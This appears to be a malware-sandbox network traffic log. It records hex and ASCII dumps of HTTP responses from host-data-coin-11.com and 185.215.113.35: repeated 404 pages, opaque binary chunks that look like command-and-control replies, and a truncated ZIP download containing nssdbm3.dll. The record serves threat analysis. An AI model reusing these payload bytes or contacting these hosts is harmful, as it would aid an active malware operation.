                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 0f 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OU:@Rw0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 62 6e b8 57 df ef 66 b1 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevbnWfdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 60 4d 87 33 c5 de 66 b2 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTev`M3fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Jan 2022 23:16:07 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 38 35 2e 32 31 35 2e 31 31 33 2e 33 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 185.215.113.35 Port 80</address></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 02 0a c1 54 a3 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OU:@RwT,/0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Jan 2022 23:16:23 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:57 GMTETag: "61d8c845-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 